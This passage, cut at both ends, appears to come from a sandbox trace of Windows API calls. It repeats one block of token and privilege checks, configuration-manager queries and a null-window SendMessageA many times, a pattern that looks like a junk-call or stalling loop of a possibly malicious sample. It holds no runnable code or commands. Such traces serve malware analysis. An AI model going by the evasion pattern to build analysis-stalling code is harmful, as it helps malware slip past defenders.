ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.235] GetLastError () returned 0x3f0 [0085.235] GetCurrentProcess () returned 0xffffffff [0085.235] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.235] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.235] SetLastError (dwErrCode=0x522) [0085.235] CloseHandle (hObject=0x114) returned 1 [0085.235] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.235] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.235] GetLastError () returned 0x578 [0085.235] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.235] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.235] GetCurrentThread () returned 0xfffffffe [0085.235] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.235] GetLastError () returned 0x3f0 [0085.235] GetCurrentProcess () returned 0xffffffff [0085.235] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.235] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.235] SetLastError (dwErrCode=0x522) [0085.235] CloseHandle (hObject=0x114) returned 1 [0085.235] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.235] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.235] GetLastError () returned 0x578 [0085.235] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.235] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.235] GetCurrentThread () returned 0xfffffffe [0085.235] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.235] GetLastError () returned 0x3f0 [0085.235] GetCurrentProcess () returned 0xffffffff [0085.235] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.235] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.235] SetLastError (dwErrCode=0x522) [0085.235] CloseHandle (hObject=0x114) returned 1 [0085.235] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.235] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.235] GetLastError () returned 0x578 [0085.236] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.236] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.236] GetCurrentThread () returned 0xfffffffe [0085.236] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.236] GetLastError () returned 0x3f0 [0085.236] GetCurrentProcess () returned 0xffffffff [0085.236] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.236] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.236] SetLastError (dwErrCode=0x522) [0085.236] CloseHandle (hObject=0x114) returned 1 [0085.236] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.236] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.236] GetLastError () returned 0x578 [0085.236] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.236] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.236] GetCurrentThread () returned 0xfffffffe [0085.236] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.236] GetLastError () returned 0x3f0 [0085.236] GetCurrentProcess () returned 0xffffffff [0085.236] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.236] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.236] SetLastError (dwErrCode=0x522) [0085.236] CloseHandle (hObject=0x114) returned 1 [0085.236] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.236] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.236] GetLastError () returned 0x578 [0085.236] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.236] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.236] GetCurrentThread () returned 0xfffffffe [0085.236] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.236] GetLastError () returned 0x3f0 [0085.236] GetCurrentProcess () returned 0xffffffff [0085.236] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.236] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.236] SetLastError (dwErrCode=0x522) [0085.236] CloseHandle (hObject=0x114) returned 1 [0085.236] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.236] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.237] GetLastError () returned 0x578 [0085.237] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.237] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.237] GetCurrentThread () returned 0xfffffffe [0085.237] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.237] GetLastError () returned 0x3f0 [0085.237] GetCurrentProcess () returned 0xffffffff [0085.237] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.237] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.237] SetLastError (dwErrCode=0x522) [0085.237] CloseHandle (hObject=0x114) returned 1 [0085.237] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.237] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.237] GetLastError () returned 0x578 [0085.237] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.237] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.237] GetCurrentThread () returned 0xfffffffe [0085.237] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.237] GetLastError () returned 0x3f0 [0085.237] GetCurrentProcess () returned 0xffffffff [0085.237] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.237] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.237] SetLastError (dwErrCode=0x522) [0085.237] CloseHandle (hObject=0x114) returned 1 [0085.238] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.238] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.238] GetLastError () returned 0x578 [0085.238] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.238] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.238] GetCurrentThread () returned 0xfffffffe [0085.238] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.238] GetLastError () returned 0x3f0 [0085.238] GetCurrentProcess () returned 0xffffffff [0085.238] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.238] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.238] SetLastError (dwErrCode=0x522) [0085.238] CloseHandle (hObject=0x114) returned 1 [0085.238] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.238] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.238] GetLastError () returned 0x578 [0085.238] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.238] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.238] GetCurrentThread () returned 0xfffffffe [0085.238] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.238] GetLastError () returned 0x3f0 [0085.238] GetCurrentProcess () returned 0xffffffff [0085.238] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.238] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.238] SetLastError (dwErrCode=0x522) [0085.238] CloseHandle (hObject=0x114) returned 1 [0085.238] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.238] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.238] GetLastError () returned 0x578 [0085.238] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.238] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.238] GetCurrentThread () returned 0xfffffffe [0085.238] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.238] GetLastError () returned 0x3f0 [0085.238] GetCurrentProcess () returned 0xffffffff [0085.238] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.238] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.239] SetLastError (dwErrCode=0x522) [0085.239] CloseHandle (hObject=0x114) returned 1 [0085.239] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.239] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.239] GetLastError () returned 0x578 [0085.239] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.239] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.239] GetCurrentThread () returned 0xfffffffe [0085.239] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.239] GetLastError () returned 0x3f0 [0085.239] GetCurrentProcess () returned 0xffffffff [0085.239] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.239] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.239] SetLastError (dwErrCode=0x522) [0085.239] CloseHandle (hObject=0x114) returned 1 [0085.239] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.239] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.239] GetLastError () returned 0x578 [0085.239] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.239] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.239] GetCurrentThread () returned 0xfffffffe [0085.239] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.239] GetLastError () returned 0x3f0 [0085.239] GetCurrentProcess () returned 0xffffffff [0085.239] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.239] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.239] SetLastError (dwErrCode=0x522) [0085.239] CloseHandle (hObject=0x114) returned 1 [0085.239] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.239] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.239] GetLastError () returned 0x578 [0085.239] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.239] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.239] GetCurrentThread () returned 0xfffffffe [0085.239] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.239] GetLastError () returned 0x3f0 [0085.239] GetCurrentProcess () returned 0xffffffff [0085.239] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.240] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.240] SetLastError (dwErrCode=0x522) [0085.240] CloseHandle (hObject=0x114) returned 1 [0085.240] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.240] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.240] GetLastError () returned 0x578 [0085.240] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.240] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.240] GetCurrentThread () returned 0xfffffffe [0085.240] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.240] GetLastError () returned 0x3f0 [0085.240] GetCurrentProcess () returned 0xffffffff [0085.240] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.240] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.240] SetLastError (dwErrCode=0x522) [0085.240] CloseHandle (hObject=0x114) returned 1 [0085.240] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.240] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.240] GetLastError () returned 0x578 [0085.240] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.240] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.240] GetCurrentThread () returned 0xfffffffe [0085.240] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.240] GetLastError () returned 0x3f0 [0085.240] GetCurrentProcess () returned 0xffffffff [0085.240] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.240] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.240] SetLastError (dwErrCode=0x522) [0085.240] CloseHandle (hObject=0x114) returned 1 [0085.240] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.240] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.240] GetLastError () returned 0x578 [0085.240] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.240] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.240] GetCurrentThread () returned 0xfffffffe [0085.240] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.240] GetLastError () returned 0x3f0 [0085.240] GetCurrentProcess () returned 0xffffffff [0085.241] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.241] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.241] SetLastError (dwErrCode=0x522) [0085.241] CloseHandle (hObject=0x114) returned 1 [0085.241] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.241] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.241] GetLastError () returned 0x578 [0085.241] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.241] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.241] GetCurrentThread () returned 0xfffffffe [0085.241] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.241] GetLastError () returned 0x3f0 [0085.241] GetCurrentProcess () returned 0xffffffff [0085.241] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.241] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.241] SetLastError (dwErrCode=0x522) [0085.241] CloseHandle (hObject=0x114) returned 1 [0085.241] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.241] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.241] GetLastError () returned 0x578 [0085.241] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.241] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.241] GetCurrentThread () returned 0xfffffffe [0085.241] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.241] GetLastError () returned 0x3f0 [0085.241] GetCurrentProcess () returned 0xffffffff [0085.241] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.241] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.241] SetLastError (dwErrCode=0x522) [0085.241] CloseHandle (hObject=0x114) returned 1 [0085.241] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.241] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.241] GetLastError () returned 0x578 [0085.241] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.241] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.241] GetCurrentThread () returned 0xfffffffe [0085.241] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.241] GetLastError () returned 0x3f0 [0085.242] GetCurrentProcess () returned 0xffffffff [0085.242] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.242] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.242] SetLastError (dwErrCode=0x522) [0085.242] CloseHandle (hObject=0x114) returned 1 [0085.242] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.242] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.242] GetLastError () returned 0x578 [0085.242] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.242] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.242] GetCurrentThread () returned 0xfffffffe [0085.242] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.242] GetLastError () returned 0x3f0 [0085.242] GetCurrentProcess () returned 0xffffffff [0085.242] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.242] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.242] SetLastError (dwErrCode=0x522) [0085.242] CloseHandle (hObject=0x114) returned 1 [0085.242] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.242] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.242] GetLastError () returned 0x578 [0085.242] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.242] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.242] GetCurrentThread () returned 0xfffffffe [0085.242] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.242] GetLastError () returned 0x3f0 [0085.242] GetCurrentProcess () returned 0xffffffff [0085.242] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.242] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.242] SetLastError (dwErrCode=0x522) [0085.242] CloseHandle (hObject=0x114) returned 1 [0085.242] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.242] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.242] GetLastError () returned 0x578 [0085.242] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.242] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.242] GetCurrentThread () 